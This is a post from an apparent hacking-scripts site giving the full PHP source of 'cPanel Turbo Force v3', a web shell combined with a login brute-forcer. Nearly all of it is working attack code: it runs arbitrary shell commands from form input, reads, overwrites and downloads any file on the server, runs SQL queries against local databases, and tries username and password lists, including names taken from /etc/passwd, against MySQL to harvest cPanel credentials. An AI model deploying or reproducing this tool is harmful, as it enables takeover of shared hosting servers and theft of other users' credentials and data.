HackingScripts

Hack Scripts for everybody

cPanel Turbo Force v3

13 Feb 2014

cPanel Turbo Force v3 – Coded By SaQEeR aL jNoOoB

cPanel Turbo Force v3 Source Code

  1 <html>
  2 
  3 <head>
  4 <title>cPanel Turbo Force v3</title>
  5 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  6 <?php
  7 /*
  8 Turbo Force V3 By SaQEeR aL jNoOoB
  9 */
 10 @set_time_limit(0);
 11 @error_reporting(0);
 12 
 13 
 14 echo '<head>
 15 
 16 <style type="text/css">
 17 <!--
 18 body {
 19    background-color: #000000;
 20     font-size: 18px;
 21    color: #cccccc;
 22 }
 23 input,textarea,select{
 24 font-weight: bold;
 25 color: #cccccc;
 26 dashed #ffffff;
 27 border: 1px
 28 solid #2C2C2C;
 29 background-color: #080808
 30 }
 31 a {
 32    background-color: #151515;
 33    vertical-align: bottom;
 34    color: #000;
 35    text-decoration: none;
 36    font-size: 20px;
 37    margin: 8px;
 38    padding: 6px;
 39    border: thin solid #000;
 40 }
 41 a:hover {
 42    background-color: #080808;
 43    vertical-align: bottom;
 44    color: #333;
 45    text-decoration: none;
 46    font-size: 20px;
 47    margin: 8px;
 48    padding: 6px;
 49    border: thin solid #000;
 50 }
 51 .style1 {
 52    text-align: center;
 53 }
 54 .style2 {
 55    color: #FFFFFF;
 56    font-weight: bold;
 57 }
 58 .style3 {
 59    color: #FFFFFF;
 60 }
 61 -->
 62 </style>
 63 
 64 </head>
 65 ';
 66 
 67 
 68 function in($type,$name,$size,$value,$checked=0) 
 69  {
 70  $ret = "<input type=".$type." name=".$name." "; if($size != 0) 
 71  {
 72  $ret .= "size=".$size." "; }
 73  $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
 74  
 75 class my_sql 
 76  {
 77  var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() 
 78  {
 79  switch($this->db) 
 80  {
 81  case 'MySQL': if(empty($this->port)) 
 82  {
 83  $this->port = '3306'; }
 84  if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port)) 
 85  {
 86  $this->port = '1433'; }
 87  if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port)) 
 88  {
 89  $this->port = '5432'; }
 90  $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
 91  return 0; }
 92  function select_db() 
 93  {
 94  switch($this->db) 
 95  {
 96  case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
 97  return 0; }
 98  function query($query) 
 99  {
100  $this->res=$this->error=''; switch($this->db) 
101  {
102  case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
103  {
104  $this->error = @mysql_error($this->connection); return 0; }
105  else if(is_resource($this->res)) 
106  {
107  return 1; }
108  return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) 
109  {
110  $this->error = 'Query error'; return 0; }
111  else if(@mssql_num_rows($this->res) > 0) 
112  {
113  return 1; }
114  return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) 
115  {
116  $this->error = @pg_last_error($this->connection); return 0; }
117  else if(@pg_num_rows($this->res) > 0) 
118  {
119  return 1; }
120  return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) 
121  {
122  $this->error = 'Query parse error'; }
123  else 
124  {
125  if(@ociexecute($this->res)) 
126  {
127  if(@ocirowcount($this->res) != 0) return 2; return 1; }
128  $error = @ocierror(); $this->error=$error['message']; }
129  break; }
130  return 0; }
131  function get_result() 
132  {
133  $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) 
134  {
135  case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
136  {
137 $this->columns = @array_keys($this->rows[0]); return 1;}
138  break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
139  {
140 $this->columns = @array_keys($this->rows[0]); return 1;}
141 ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
142  {
143 $this->columns = @array_keys($this->rows[0]); return 1;}
144  break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
145  {
146 $this->columns = @array_keys($this->rows[0]); return 1;}
147  break; }
148  return 0; }
149  function dump($table) 
150  {
151  if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '
152 ###'; $this->dump[1] = '
153 ### --------------------------------------- '; $this->dump[2] = '
154 ###  Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '
155 ### Database: '.$this->base; $this->dump[4] = '
156 ###    Table: '.$table; $this->dump[5] = '
157 ### --------------------------------------- '; switch($this->db) 
158  {
159  case 'MySQL': $this->dump[0] = '
160 ### MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '
161 ### --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
162  {
163  foreach($this->rows[$i] as $k=>$v) 
164  {
165 $this->rows[$i][$k] = @mysql_real_escape_string($v);}
166  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
167  break; case 'MSSQL': $this->dump[0] = '
168 ### MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
169  {
170  foreach($this->rows[$i] as $k=>$v) 
171  {
172 $this->rows[$i][$k] = @addslashes($v);}
173  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
174  break; case 'PostgreSQL': $this->dump[0] = '
175 ### PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
176  {
177  foreach($this->rows[$i] as $k=>$v) 
178  {
179 $this->rows[$i][$k] = @addslashes($v);}
180  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
181  break; case 'Oracle': $this->dump[0] = '
182 ### ORACLE dump'; $this->dump[] = '
183 ### under construction'; break; default: return 0; break; }
184  return 1; }
185  function close() 
186  {
187  switch($this->db) 
188  {
189  case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
190  }
191  function affected_rows() 
192  {
193  switch($this->db) 
194  {
195  case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
196  }
197  }
198  if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name'])) 
199  {
200  if(!$file=@fopen($_POST['d_name'],"r")) 
201  {
202  err(1,$_POST['d_name']); $_POST['cccc']=""; }
203  else 
204  {
205  @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) 
206  {
207  header('Content-Encoding: ' . $content_encoding); }
208  header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
209  }
210  if(isset($_GET['phpinfo'])) 
211  {
212  echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
213  if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query") 
214  {
215  echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else 
216  {
217  if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else 
218  {
219  foreach($querys as $num=>$query) 
220  {
221  if(strlen($query)>5) 
222  {
223  echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) 
224  {
225  case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) 
226  {
227  echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) 
228  {
229  foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
230  echo "</table>"; }
231  break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
232  }
233  }
234  }
235  }
236  echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>"; 
237  echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query'); 
238  echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
239 
240 
241 
242 
243 
244 
245 
246 
247 
248 
249 
250 
251 
252 
253 
254 
255 
256 
257 
258 
259 
260 
261 
262 function ccmmdd($ccmmdd2,$att)
263 {
264 global $ccmmdd2,$att;
265 echo '
266 <table style="width: 100%" class="style1" dir="rtl">
267    <tr>
268        <td class="style9"><strong>���� ������</strong></td>
269    </tr>
270    <tr>
271        <td class="style13">
272                <form method="post">
273                    <select name="att" dir="rtl" style="height: 109px" size="6">
274 ';
275 if($_POST['att']==null)
276 {
277 echo '                      <option value="system" selected="">system</option>';
278 }else{
279 echo "                     <option value='$_POST[att]' selected=''>$_POST[att]</option>
280                        <option value=system>system</option>
281 ";
282 
283                         
284 }
285 
286 echo '
287                        <option value="passthru">passthru</option>
288                        <option value="exec">exec</option>
289                        <option value="shell_exec">shell_exec</option>    
290                    </select>
291                        <input name="page" value="ccmmdd" type="hidden"><br>
292                        <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
293                        <input type="submit" value="�����">
294                </form>
295        
296        </td>
297    </tr>
298    <tr>
299        <td class="style13">
300 ';
301 
302         if($_POST[att]=='system')
303         {
304 echo '
305                    <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
306                     system($_POST['ccmmdd2']);
307 echo '                  </textarea>';
308 
309 
310         }
311 
312         if($_POST[att]=='passthru')
313         {
314 echo '
315                    <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
316                     passthru($_POST['ccmmdd2']);
317 echo '                  </textarea>';
318 
319 
320         }
321 
322         
323 
324 
325 
326         if($_POST[att]=='exec')
327         {
328 
329 echo '                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
330                     exec($_POST['ccmmdd2'],$res);
331                 echo $res = join("\n",$res);               
332 echo '                  </textarea>';
333 
334 
335         }
336 
337 
338 
339 
340 
341 
342 
343         if($_POST[att]=='shell_exec')
344         {
345 
346 echo '                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
347                 echo shell_exec($_POST['ccmmdd2']);
348 echo '                  </textarea>';
349 
350 
351         }
352 echo '      
353        </td>
354    </tr>
355 </table>
356 ';
357 
358 exit;
359 }
360 
361 if($_POST['page']=='edit')
362 {
363 
364 $code=@str_replace("\r\n","\n",$_POST['code']);
365 $code=@str_replace('\\','',$code);
366 $fp = fopen($pathclass, 'w');
367 fwrite($fp,"$code");
368 fclose($fp);
369 echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
370 exit;
371 }    
372 
373 
374 
375 
376 
377 
378 
379     if($_POST['page']=='show')
380     {
381     $pathclass =$_POST['pathclass'];
382 echo '
383 <form method="POST">
384 <input type="hidden" name="page" value="edit">
385 ';
386     
387     $sahacker = fopen($pathclass, "rb");
388 echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';  
389 $code = fread($sahacker, filesize($pathclass));
390 echo $code =htmlspecialchars($code);
391 echo '</textarea>'; 
392     fclose($sahacker);
393 echo '
394 <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
395 <br><strong><input type="submit" value="edit file">
396 </form>
397 ';
398         exit;
399     }
400 
401 
402 
403 
404     if($_POST['page']=='ccmmdd')
405     {
406     echo ccmmdd($ccmmdd2,$att);
407     exit;
408     }
409 
410 
411 
412 
413 
414 
415 
416 
417 
418 
419 
420 
421 
422 
423 
424 
425 
426 
427 
428 
429 
430 
431 
432 
433 if($_POST['page']=='find')
434 {
435 if(isset($_POST['usernames']) && isset($_POST['passwords']))
436 {
437     if($_POST['type'] == 'passwd'){
438         $e = explode("\n",$_POST['usernames']);
439         foreach($e as $value){
440         $k = explode(":",$value);
441         $username .= $k['0']." ";
442         }
443     }elseif($_POST['type'] == 'simple'){
444         $username = str_replace("\n",' ',$_POST['usernames']);
445     }
446     $a1 = explode(" ",$username);
447     $a2 = explode("\n",$_POST['passwords']);
448     $id2 = count($a2);
449     $ok = 0;
450     foreach($a1 as $user )
451     {
452         if($user !== '')
453         {
454         $user=trim($user);
455          for($i=0;$i<=$id2;$i++)
456          {
457             $pass = trim($a2[$i]);
458             if(@mysql_connect('localhost',$user,$pass))
459             {
460                 echo "SaQEeR~ username is ===> (<b><font color=green>$user</font></b>) Password is ===> (<b><font color=green>$pass</font></b>)<br />";
461                 $ok++;
462             }
463          }
464         }
465     }
466     echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By SaQEeR aL jNoOoB Script Name</b>";
467     echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
468     exit;
469 }
470 }
471 ?>
472 
473 
474 
475 
476 </head>
477 
478 
479 
480 
481 <form method="POST" target="_blank">
482     <strong>
483 <input name="page" type="hidden" value="find">                      
484     </strong>
485     <table width="748" border="0" cellpadding="3" cellspacing="1" align="center">
486     <tr>
487         <td valign="top" bgcolor="#151515" height="67"><center><strong><img src="http://im26.gulfup.com/2012-05-07/1336413453971.png" /><br>
488         </strong>
489         <a href="mailto:h1h@hotmail.be" class="style2"><strong>Cpanel Brute By SaQEeR aL jNoOoB</strong></a></center></td>
490     </tr>
491     <tr>
492     <td>
493     <table width="109%" border="0" cellpadding="3" cellspacing="1" align="center">
494     <td valign="top" bgcolor="#151515" class="style2" style="width: 19%" height="310">
495     <strong><font size="4">User :</font></strong></td>
496     <td valign="top" bgcolor="#151515" colspan="5" height="310"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
497     </tr>
498     <tr>
499     <td valign="top" bgcolor="#151515" class="style2" style="width: 19%" height="263">
500     <strong><font size="4">Pass :</font></strong></td>
501     <td valign="top" bgcolor="#151515" colspan="5" height="263"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
502     </tr>
503     <tr>
504     <td valign="top" bgcolor="#151515" class="style2" style="width: 19%" height="28">
505     <strong><font size="4">Type :</font></strong></td>
506     <td valign="top" bgcolor="#151515" colspan="5" height="28">
507     <span class="style2"><strong><font size="4">Simple :</font> </strong> </span>
508     <strong>
509     <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
510     <font class="style2"><strong><font size="4">/etc/passwd :</font> </strong> </font>
511     <strong>
512     <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
513     </strong>
514     </span>
515     </td>
516     </tr>
517     <tr>
518     <td valign="top" bgcolor="#151515" style="width: 19%" height="32"></td>
519     <td valign="top" bgcolor="#151515" colspan="5" height="32"><strong><input type="submit" value="start">
520     </strong>
521     </td>
522     <tr>
523 </form>    
524     
525     <td valign="top" colspan="6" height="26" bgcolor="#151515">
526     <p align="center"><u><b><span id="result_box" class lang="en">
527     <span class="hps"><font size="4">If you</font></span><font size="4">
528     <span class="hps">want</span> <span class="hps">users to</span>
529     <span class="hps">the server</span> <span class="hps">at the end of</span>
530     </font><span class="hps"><font size="4">script</font></span></span></b></u></td>
531 
532 <form method="POST" target="_blank">
533 <strong>
534 <input type="hidden" name="go" value="cmd_mysql">
535         </strong>
536         <tr>
537     <td valign="top" bgcolor="#151515" class="style1" colspan="6" height="29"><strong>
538     <font size="4">CMD MYSQL</font></strong></td>
539                     </tr>
540         <tr>
541     <td valign="top" bgcolor="#151515" style="width: 19%" height="29"><strong>
542     <font size="4">user:</font></strong></td>
543     <td valign="top" bgcolor="#151515" height="29" width="17%"><strong><input name="mysql_l" type="text"></strong></td>
544     <td valign="top" bgcolor="#151515" height="29" width="10%"><strong>
545     <font size="4">pass:</font></strong></td>
546     <td valign="top" bgcolor="#151515" height="29" width="16%"><strong><input name="mysql_p" type="text"></strong></td>
547     <td valign="top" bgcolor="#151515" height="29" width="12%"><strong>
548     <font size="4">database:</font></strong></td>
549     <td valign="top" bgcolor="#151515" height="29" width="20%"><strong><input name="mysql_db" type="text"></strong></td>
550                     </tr>
551                     <tr>
552     <td valign="top" bgcolor="#151515" style="height: 25px; width: 19%;">
553     <strong><font size="4">cmd</font><font size="4"> :</font></strong></td>
554     <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
555     <strong>
556     <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
557 SHOW TABLES user_vb ;
558 SELECT * FROM user;
559 SELECT version();
560 SELECT user();</textarea></strong></td>
561         </tr>
562         <tr>
563     <td valign="top" bgcolor="#151515" style="width: 19%">&nbsp;</td>
564     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
565         </tr>
566 <input name="db" value="MySQL" type="hidden">
567 <input name="db_server" type="hidden" value="localhost">
568 <input name="db_port" type="hidden" value="3306">
569 <input name="cccc" type="hidden" value="db_query">
570         
571 </form>       
572         <tr>
573     <td valign="top" bgcolor="#151515" colspan="6">&nbsp;</td>
574 
575 
576         </tr>
577         
578 <form method="POST" target="_blank">
579         <tr>
580     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
581     <font size="4">CMD 
582     system - passthru - exec - shell_exec</font></strong></td>
583                     </tr>
584         <tr>
585     <td valign="top" bgcolor="#151515" style="width: 19%"><strong>
586     <font size="4">cmd :</font></strong></td>
587     <td valign="top" bgcolor="#151515" colspan="5">
588                     <select name="att" dir="rtl"  size="1">
589 <?php
590 if($_POST['att']==null)
591 {
592 echo '                      <option value="system" selected="">system</option>';
593 }else{
594 echo "                     <option value='$_POST[att]' selected=''>$_POST[att]</option>
595                        <option value=system>system</option>
596 ";
597 
598                         
599 }
600 ?>
601 
602                         <option value="passthru">passthru</option>
603                         <option value="exec">exec</option>
604                         <option value="shell_exec">shell_exec</option>
605                     </select>    
606     <strong>
607 <input name="page" type="hidden" value="ccmmdd">    
608     <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
609         </tr>
610         <tr>
611     <td valign="top" bgcolor="#151515" style="width: 19%">&nbsp;</td>
612     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
613         </tr>
614 </form>               
615 
616 <form method="POST" target="_blank">
617 
618         <tr>
619     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
620     <font size="4">Show 
621     File And Edit</font></strong></td>
622                     </tr>
623         <tr>
624     <td valign="top" bgcolor="#151515" style="width: 19%"><strong>
625     <font size="4">Path :</font></strong></td>
626     <td valign="top" bgcolor="#151515" colspan="5">
627     <strong>
628     <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
629         </tr>
630         <tr>
631     <td valign="top" bgcolor="#151515" style="width: 19%">&nbsp;</td>
632     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
633                     </tr>
634 <input name="page" type="hidden" value="show">                      
635 </form>                   
636                     <tr>
637     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
638     <font size="4">Info 
639     Security</font></strong></td>
640                     </tr>
641         <tr>
642     <td valign="top" bgcolor="#151515" style="width: 19%"><strong>
643     <font size="4">Safe Mode</font></strong></td>
644     <td valign="top" bgcolor="#151515" colspan="5">
645     <strong>
646 <?php
647 $safe_mode = ini_get('safe_mode');
648 if($safe_mode=='1')
649 {
650 echo 'ON';
651 }else{
652 echo 'OFF';
653 }
654 
655 ?>   
656     </strong> 
657     </td>
658                     </tr>
659     <tr>
660     <td valign="top" bgcolor="#151515" style="width: 19%"><strong>
661     <font size="4">Function</font></strong></td>
662     <td valign="top" bgcolor="#151515" colspan="5">
663     <strong>
664 <?php
665 if(''==($func=@ini_get('disable_functions')))
666 {
667 echo "<font color=#00800F>No Security for Function</font></b>";
668 }else{
669 echo "<font color=red>$func</font></b>";
670 }
671 ?></strong></td>
672     <tr>
673     <td valign="top" bgcolor="#151515" style="width: 19%">&nbsp;</td>
674     <td valign="top" bgcolor="#151515" colspan="5">&nbsp;</td>
675     </table>
676     </td>
677     </tr>
678     </table>
679     
680     
681     
682     
683     <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
684 
685 
686 
687 
688 
689       <form style="border: 0px ridge #FFFFFF">
690 
691 
692 
693 
694     <p align="center"></td>
695   </tr><div align="center">
696 
697                 <tr>
698 
699 
700 
701 <input type="submit"   name="user" value="user"><option value="name"></select>
702 </form>
703 
704 
705 <div align="center">
706  <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5">
707 <tr>
708 <td bordercolorlight="#008000" bordercolordark="#006A00">
709 <p align="left">
710 <textarea  method='POST' rows="25" name="S1" cols="16">
711 
712 
713 <?php
714 
715 
716 
717       if ($_GET['user'] )
718 
719 
720       system('ls /var/mail');
721 
722 
723 
724 
725 
726                                            for($uid=0;$uid<90000;$uid++){
727 
728                                         }
729 
730 
731 
732 
733 ?></textarea></table>
734     <strong>
735     <h3><font size="6" color="#333333">< Coded By SaQEeR aL jNoOoB ></font></h3>
736     </strong>
737     <p>nbsp;

Saqueer shell screenshot

Saqueer shell screenshot

Saqueer shell screenshot